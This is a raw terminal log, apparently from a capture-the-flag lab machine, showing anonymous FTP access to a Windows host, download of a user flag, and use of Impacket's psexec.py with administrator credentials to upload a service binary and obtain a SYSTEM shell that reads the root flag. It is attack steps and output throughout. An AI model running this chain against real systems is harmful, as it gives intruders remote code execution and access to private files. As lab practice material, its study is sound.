ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
11-04-19 03:25AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
11-04-19 03:28AM 88 tester.txt
02-02-19 11:35PM 33 user.txt
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.32 secs (0.0994 kB/s)
$ cat user.txt
dd58ce67b49e15105×××
$ /opt/impacket/examples/psexec.py [email protected]
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file hOFlpyyw.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service jPEV on 10.10.10.152.....
[*] Starting service jPEV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
c:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users\Administrator\Desktop
02/02/2019 11:35 PM <DIR> .
02/02/2019 11:35 PM <DIR> ..
02/02/2019 11:35 PM 33 root.txt
1 File(s) 33 bytes
2 Dir(s) 12,058,017,792 bytes free
C:\Users\Administrator\Desktop>type root.txt
3018977fb944bf1878f7××××××